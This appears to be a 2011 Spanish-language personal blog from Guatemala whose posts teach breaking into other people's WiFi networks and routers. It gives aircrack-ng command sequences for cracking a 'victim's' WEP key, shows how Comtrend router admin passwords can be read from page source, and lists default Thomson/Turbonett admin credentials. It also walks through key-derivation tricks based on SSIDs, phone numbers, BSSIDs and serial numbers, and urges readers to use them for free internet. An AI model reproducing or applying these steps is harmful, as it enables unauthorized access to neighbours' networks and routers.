Encotrar claves wep con backtrack

jueves, 9 de junio de 2011

abrimos una shell

airmon-ng stop eth1

para saber nuestra interfas ponemos esto notra eth1 es la interfas que yo manejo la interfas es la tarjeta que usas

ifconfig eth1 down


macchanger --mac 00:11:22:33:44:55 eth1

para cambiar nuestra mac

airmon-ng start eth1

para activar nuestra tarjeta en modo monitor

airodump-ng eth1

para ver redes al alcance nota copiar la mac el canal y el nombre de la red

airodump-ng --channel x --write pass eth1

esto crea un archivo para poder capturar la red nota en la x sustituir por el canal que esta la red y en donde dice pass pueden poner lo que quieran


aireplay-ng -3 -b (mac de la victima) -h 00:11:22:33:44:55 eth1

ahora esto es para las señales arp cuando tengamos 62,000 arp estara listo




aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 eth1

esto se ace para acelerar el proceso en recuperar arp


aircrack-ng pass-01.cap

para sacar la pass,, cuando tengamos 62,000 arp detenemos todas las shell y ponemos esto para encontrar la clave wep y listo

Para ingresar a las opciones del router comtrend

viernes, 13 de mayo de 2011

Si vives en Guatemala y tienes el servicio de claro de Internet seguro tienes un router de estos comtrend, bueno esto puede servir para muchas cosas, como cambiar la clave wi-fi o los dns también se puede cambiar el ssid para que no se metan a nuestra red.
Lo bueno de este router es que le podemos poner mas de cuatro claves wi-fi validas, se los dejo para que lo revisen, bien

Primero abrimos nuestro navegador
Segundo Escriben esto 192.168.1.1/password.cgi en la barra de dirección del navegador
Después de hacer esto nos saldrá esto

Access Control -- Passwords

Access to your DSL router is controlled through three user accounts: admin and user.

The user name "admin" has unrestricted access to change and view configuration of your DSL Router.

The user name "user" can access the DSL Router, view configuration settings and statistics, as well as, update the router's software.

Use the fields below to enter up to 16 characters and click "Apply" to change or create passwords. Note: Password cannot contain a space.

Username:
Old Password:

New Password:

Confirm Password:


En user hay una pestaña desplegable la abrimos y escogemos admin. O user
Donde dice old password ponemos c1@r0 si escogimos admin. Y Turbonett si escogimos user
Y en new password un pas que nos recordemos

Entonces ya echo esto abrimos otra pestaña y en la barra del navegador colocamos 192.168.1.1
Y nos pedira user y password
Entonces ponemos
Como user Admin
Y como password el nuevo que pusimos y listo estamos en el router.


Este es otro modo de hacerlo
Abrimos el navegador
En la barra ponemos 192.168.1.1/password.cgi
Nos aparecerá esto

Access Control -- Passwords

Access to your DSL router is controlled through three user accounts: admin and user.

The user name "admin" has unrestricted access to change and view configuration of your DSL Router.

The user name "user" can access the DSL Router, view configuration settings and statistics, as well as, update the router's software.

Use the fields below to enter up to 16 characters and click "Apply" to change or create passwords. Note: Password cannot contain a space.
Username:
Old Password:

New Password:

Confirm Password:


en un costado de la hoja del navegador damos clic derecho y seleccionamos
ver código fuente y nos saldrá esto

pwdAdmin = 'c1@r0';
pwdUser = 'Turbonett';

es mas largo el HTML que sale pero busquen estos dos reglones donde están las dos claves una para admin. Y otra para user..
espero les sea de utilidad como a mi
esto sirve con todos los router comtrend de todo el mundo solo que cambian las claves dependiendo el servicio de Internet que tengamos..

HAMY TEJEDA DIOSA GUATEMALTECA

jueves, 21 de abril de 2011

Fotos no aptas para los ojos de los mortales





























La mujer más linda de wa-t

Tip cuatro wifi gratis, el apagón milagroso

miércoles, 20 de abril de 2011

Este es el cuarto tip para tener Internet gratis en nuestra casa es el ultimo y por casualidad di con el, ya que hay pocas paginas que hablan del tema, bien lo que necesitamos es el programa network stumbler si lo pueden encontrar en Google que esta por todos lados y es gratis seguro lo consiguen rápido, también necesitamos una laptop o tener planta eléctrica de algunas horas de duración aunque depende mucho de cuanto se tarde el paso tres ahora lo explico, este tercer paso me sucedió a mi estaba en mi ventana y de pronto un apagón hubo un corte de energía en toda la zona pero al tener laptop seguí viendo mi anime que me estaba discutiendo, después de media hora restablecen el servicio de energía en toda la zona, en ese momento sin pasar ni 5 segundos activo el programa network stumbler y la sorpresa cuando veo las redes que siempre me detecta el PC de una forma extraña, en ves de decir turbonett que es la SSID tenia el nombre de
thomson86FA93, ya con estos datos me puse a investigar y encontré la info. en barias paginas que estas tienen información mas especifica y quien fue el descubridor de este método aquí están pueden verlas si quieren

http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/


http://foro.elhacker.net/hacking_wireless/routers_thomson_caso_espanol_redes_wepwpa_%E2%80%9Cspeedtouchxxxxxx%E2%80%9D_al_descubierto-t208312.0.html


http://lampiweb.com/foro/index.php?topic=1763.0

bien siguiendo con mi tip, ya teniendo la información que nos dan los router cuando se resetean fue lo que paso cuando menguo el servicio eléctrico , se resetearon todos los routers y cuando este router marca Thomson se esta iniciando nos da el verdadero ssid de fabrica y con esto podemos saber la clave wifi de este router bien doy el ejemplo me dejo de blabla
tomamos la ssid que capturamos que seria un ejemplo
thomson86FA93
a esto le quitamos Thomson y nos queda 86FA93
bien ahora necesitan un programa llamado stkeys-gui lo pueden descargar de
http://www.taringa.net/posts/taringa/7395072/stKeys2-GUI.html
si no sirve el link buscarlo en Google como stkeys-gui seguro lo encuentran
bien ya teniendo el stkeys lo ejecutamos en su centro hay un código lo borramos y ponemos los seis números que le quitamos al Thomson86FA93 que seria el 86FA93
y lo ejecutamos, nos abre una ventana negra y nos da las posibles claves wifi son por lo regular dos o tres las podemos probar todas que esto comprobado si funciona y una de las claves que nos dio el stkeys es la que necesitamos
en resumen
mi router es Thomson86FA93
poniendo en stkeys 86FA93
me dio la clave CD9673E8F5
comprobado asi que viendo de este modo el apagón fue bueno en ese momento y siempre pensaba que lata los apagones pero sáquemeles provecho
nota este procedimiento sirve con el Thomson speedtouch v6 y el Thomson v7 que es el mas común y esta por todos lados.

Entonces ya sabiendo esto estoy investigando como saber el numero de serie de los router Thomson por que sabiendo el numero de seri del router no necesitamos el apagón doy el ejemplo
Bien el numero de serie de mi router es CP0929SFQFD
Para esto necesitamos una calculadora que tenga ingeniería regresiva que la encontramos en
http://www.elhacker.net/convertidor.html
que es solo un convertidora nota si no funciona el link buscar el convertidora en http://www.elhacker.net
entonces al numero lo dividimos de serie lo dividimos CP 09 29 SF QFD
Donde, que significa cada cosa?...
CP 09 29 SF QFD
CP YY WW PP XXX
YY es el año de fabricación. ( 2006 ) ?
WW es la semana del año. ( 15 ) una semana de Abril ?
PP es el código de producción/fabricación. ( JT ) ?
Con esto, y tomando como ejemplo CP0929SFQFD el proceso es el siguiente:
Se eliminan los valores CC que seria el valor SF del numero de serie nos quedara algo asi
CP0929QFD
Convertimos los valores de XXX a hexadecimal. Es decir tomamos QFD del numero de serie abrimos el conversos de la pagina que ya dije pegamos QFD en la hoja de arriba del conversor en la parte media de las hojas blancas hay una flecha para seleccionar allí seleccionamos ASII A HEXADECIMAL presionamos procesar y en la hoja de abajo nos dará este valor 514644
Tomamos este numero y lo ponemos en lo ultimo de CP0929 y nos quedara así CP0929514644
Ya con este numero lo copiamos y lo pegamos de nuevo en el conversor en la hoja de arriba en la selección ponemos ascii a sha1 y nos dará como resultado esto
cd9673e8f550e5ced3dc0972dae387626586fa93
Vemos los últimos seis numero de el código que nos dio que serian 86fa93 y luego le agregamos Thomson y nos quedara el verdadero ssid del router que seria thomson86fa93
censillo pero este método es solo sabiendo el numero de serie del router así que si alguien sabe como sacarlo dígame que lo necesito. Órale ….
A, y el router es Mio y es de turbonett y me pela por que no esta registrado …

Tres tips

viernes, 4 de febrero de 2011

Tres tips para tener Internet gratis en Guatemala
Bueno esto ya me pela publicarlo por que ya toda la mara lo sabe pero los que no les servirá de mucho.
El primer tip:
Tengamos en cuenta que las señales wifi siempre que escaneamos tienen seguridad wep de 128 y la mayoría de las personas no cambian la contraseña de su router cuando adquieren el servicio, y para algunos esto es maravilloso aun que al morro del Roberto García le caiga mal que le roben la señal de su Internet jajaj.

El primer tip es por si alguna vez escaneamos y en el nos sale un numero por ejemplo 22834525 ese es el numero de tel que tienen en esa casa y también esto seria la SSID
En algunos casos nos sale TURBONETT como la SSID pero ahora explico lo del numero, cuando escaneamos nos sale el numero ya tenemos para sacar Internet gratis, como ahora lo explico, si nos sale el numero ya mencionado 22834525 lo copiamos en la calculadora y lo volvemos hexadecimal es decir de que es el sistema numérico 16 de a-f y 0-9 al pasarlo a hexadecimal nos quedara esto 15C6D5D a esto le agregamos el 1 al principio y 0A al final nos queda esto 115c6d5d0A y esa seria la clave para poder entrar en esa red…
Si no puedes usar la calculadora hay una pagina con un programa que lo hace por vos ahora pongo el link.
http://barrel.toolzoft.com/tecnologia/telgua-wep-crack-license-to-wardrive/.


Segundo tip:
Esto solo les servirá si tienen algún café Internet cerca o algún amigo que los deje manipular su pc por supuesto que tenga Internet wifi amenos aquí en guate como el dominante es turbonett los router tienen wifi siempre.
Pero ahora lo explico con una café Internet cerca, bueno como todos los clientes pides tu tiempo y checa que tenga el navegador mozilla firefox que es el mas fácil de utilizar en el Internet Explorer cuesta mucho no digamos en chrome o opera, bien usamos el firefox en la maquina del café Internet y ponemos en la barra de navegador como cualquier pagina
http://192.168.1.1 en el caso que no les sirva la ip copien este link http://192.168.1.1/cgi/b/lan/?ce=1&be=0&l0=3&l1=-1 prueben dos o tres veces si no les sale, y cuando hagan esto les aparecerá una pagina especial que les pide nombre y contraseña
la contraseña que usan la mayoría y ya lo probé como con 20 router es poner en nombre admin. Y en contraseña: !T3lgu@. Les dejo algunas más viejas si nos les sirve esa
admin ---- admin
root ---- !T3lgu@
root ---- root
Usuario: admin
Password: Turbonett
user: password
admin :Password
si lo hicieron todo bien ya estarán adentro del router la mayoría son router Speed touch de marca Thomson bueno verán debajo de Thomson 4 pestañas busquen la que dice red domestica que es la cuarta ósea la de asta abajo presionen la pestaña y busquen wriles en el desplegable ,busquen arriba de donde dice puntos de acceso turbonett configuración lo presionan y buala verán primero la mac del router después donde dice ssid que es turbonett pero lo que nos importa es asta abajo donde dice calve de cifrado web esa es la clave wifi de 64 bit, ahora ya la pueden localizar de 20 metros de su casa,, jaja,,,, ver mas abajo del router hay una opción que dice configurar wds esto sirve si solo si tenemos otro router de la misma marca lo que hace esto es poner como repetidor el router es decir si un router me alcanza para una distancia de 25 mts Max con el otro router serian de 50 mts pero configurarlo es complicado lo explico después.

Tercer tip:
Este tip es el mas sencillo pero es de lo mas nuevo, gracias a los router que esta distribuyendo claro, si solo los router que tienen el logo de claro como saber que router es claro bueno es fácil, ponemos nuestra laptop o cualquier dispositivo que detecte señales wifi escaneamos y si tenemos la suerte de encontrar una ssid con el nombre ejemplo turbonett_868689 vamos por buen camino para ello necesitamos un programa que nos de la BSSID del router ósea la Mac , hay un programa que es gratis que hace todo esto se llama network stumbler que es gratis en Internet búsquenlo gratis en Google
Bien ya teniendo el programa lo abrimos y este ba. encontrar las señales cercanas buscamos las que ya mencione la del ejemplo el programa es fácil de usar hay un botón que es parecido al play para poner música lo presionamos y buscamos la señal del ejemplo turbonett_868689 y nos daremos cuenta que el programa nos da una BSSID primero esto es la Mac y así es como obtenemos la Mac y listo la Mac es todo por que tiene toda la información de la clave por ejemplo;
Una ssid ; turbonett_868688
Y bssid : 64680C868689
La clase wifi seria quitando el 64 de la ssid copiando los 4 números que le siguen al 64 que serian 680C y luego copiamos los números del ssid sin el turbonett_ ósea solo 868688 y juntamos los números que copiamos del bssid 680C con los que sacamos del ssid 868688 nos quedara asi 680C868688 y esta seria nuestra clave wifi nota este tip solo funciona cuando el dueño del router no a cambiado su clave y en todo caso la mayoría no cambia la clave…

Bien ahora que saben no lo divulguen así tendrán Internet gratis por algunos meses jajaj
Por eso en el titulo solo puse 3 tips para que no lo encuentren aun ,

Aun que se pongan enojados los dueños del Internet pero esta muy caro así que le agan huevos, y por ultimo ya salio el hen 6.31 para psp que de ahuevo con el prometheus 6.20 podremos correr los iso y los cso con el cf 6.31 después pongo el tuto.. órale -